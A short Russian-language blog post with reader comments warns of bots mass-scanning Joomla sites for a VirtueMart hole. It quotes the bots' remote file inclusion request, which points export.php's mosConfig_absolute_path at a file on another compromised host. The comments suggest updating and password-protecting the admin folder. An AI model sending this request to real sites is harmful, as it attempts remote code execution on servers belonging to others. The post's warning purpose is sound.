Очередная дыра в Joomla-VirtueMart

Может и не такая новая, но сейчас массово лезут боты в попытках найти уязвимую установку Joomla.
Делают так:
GET /any-your-dir/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://already-victim/badfile.txt??

» » »

4 Responses to “Очередная дыра в Joomla-VirtueMart”

  1. bender Says:

    А как с этим бороться - сайт из за этого отключил хостер.

    (Включена подписка на комментарии)

  2. Путник Says:

    кроме как обновиться - я дополнительно закрываю админки средствами .htpasswd

    Если пригодится - с Вас ссылка ;)

  3. Дмитрий Says:

    Уже не актуально. export.php просто нет по указанному адресу

  4. Бижутерия Says:

    Есть кстати какой то компонент который добавляет к administrator дополнительный ключ, думаю поможет в этой беде.

    (Включена подписка на комментарии)

Оставить комментарий - Feel free to ask me in English

Он появится после того, как будет одобрен. - All comments are pre-moderated.

Внимание! Пожалуйста, не пишите в комментарии [url=... или [url]... - это будет считаться спамом. Если хотите дать ссылку - пишите просто адрес, до 2х на один коммент.
Attention! Please don't use "[url=..." or "[url]..." in comment's body or it will be deleted as spam
If you want to send me a link just type url, up to 2 urls in one comment.

Спасибо за отзыв! Thank you for a comment!